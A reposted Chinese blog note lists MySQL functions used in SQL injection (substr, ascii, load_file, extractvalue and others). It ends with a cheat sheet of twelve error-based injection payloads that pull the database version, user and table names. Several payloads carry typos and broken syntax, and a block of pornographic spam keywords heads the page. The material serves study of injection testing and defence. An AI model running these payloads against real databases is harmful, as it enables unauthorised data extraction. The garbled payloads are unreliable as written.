日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

sql 注入 相关函数

發布時間:2024/9/30 编程问答 24 豆豆
生活随笔 收集整理的這篇文章主要介紹了 sql 注入 相关函数 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

1,mid()---從文本字段中提取字符

2,limit()---返回前幾條或者中間某幾行數據 ,其m指記錄始index0始表示第條記錄 n指第m+1條始取n條

3,MySQL的concat函數在連接字符串的時候,只要其中一個是NULL,那么將返回NULL

4,和concat不同的是, concat_ws函數在執行的時候,不會因為NULL值而返回NULL

5,group_concat([DISTINCT] 要連接的字段 [Order BY ASC/DESC 排序字段] [Separator '分隔符'])

6,Count()---聚集函數,統計元組(列)的個數

7,random()---用于產生一個0~1的隨機數

8,floor()---向下取整

9,group by---依據我們想要的規則對結果進行分組

10,Substr()---截取字符串 三個參數 (所要截取字符串,截取的位置,截取的長度)

11,Ascii()---返回字符串的ascii碼

12,load_file()函數,可以幫助用戶快速讀取文件,但是文件位置必須在服務器上,文件路徑必須為絕對路徑,而且需要root權限,

13,

ord(str)?: 在python 中?ord() 函數是 chr() 函數(對于8位的ASCII字符串)或 unichr() 函數(對于Unicode對象)的配對函數,它以一個字符(長度為1的字符串)作為參數,返回對應的 ASCII 數值,或者 Unicode 數值,如果所給的 Unicode 字符超出了你的 Python 定義范圍,則會引發一個 TypeError 的異常。

? ? ? ? ? ? ? ? ? 在 PHP 中??ord() 函數返回字符串中第一個字符的 ASCII 值。

?

if(a,b,c)?:a為條件,a為true,返回b,否則返回c,如if(1>2,1,0),返回0

14,

extractvalue()
extractvalue() :對XML文檔進行查詢的函數

其實就是相當于我們熟悉的HTML文件中用 <div><p><a>標簽查找元素一樣

語法:extractvalue(目標xml文檔,xml路徑)

第二個參數 xml中的位置是可操作的地方,xml文檔中查找字符位置是用 /xxx/xxx/xxx/…這種格式,如果我們寫入其他格式,就會報錯,并且會返回我們寫入的非法格式內容,而這個非法的內容就是我們想要查詢的內容。

正常查詢 第二個參數的位置格式 為 /xxx/xx/xx/xx ,即使查詢不到也不會報錯

15 各種報錯playload:

1、通過floor報錯,注入語句如下: and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);2、通過ExtractValue報錯,注入語句如下: and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));3、通過UpdateXml報錯,注入語句如下: and 1=(updatexml(1,concat(0x3a,(select user())),1))4、通過NAME_CONST報錯,注入語句如下: and exists(select*from (select*from(selectname_const(@@version,0))a join (select name_const(@@version,0))b)c)5、通過join報錯,注入語句如下: select * from(select * from mysql.user ajoin mysql.user b)c;6、通過exp報錯,注入語句如下: and exp(~(select * from (select user () ) a) );7、通過GeometryCollection()報錯,注入語句如下: and GeometryCollection(()select *from(select user () )a)b );8、通過polygon ()報錯,注入語句如下: and polygon (()select * from(select user ())a)b );9、通過multipoint ()報錯,注入語句如下: and multipoint (()select * from(select user() )a)b );10、通過multlinestring ()報錯,注入語句如下: and multlinestring (()select * from(selectuser () )a)b );11、通過multpolygon ()報錯,注入語句如下: and multpolygon (()select * from(selectuser () )a)b );12、通過linestring ()報錯,注入語句如下: and linestring (()select * from(select user() )a)b );

?

?

?

?

?

?

?

總結

以上是生活随笔為你收集整理的sql 注入 相关函数的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。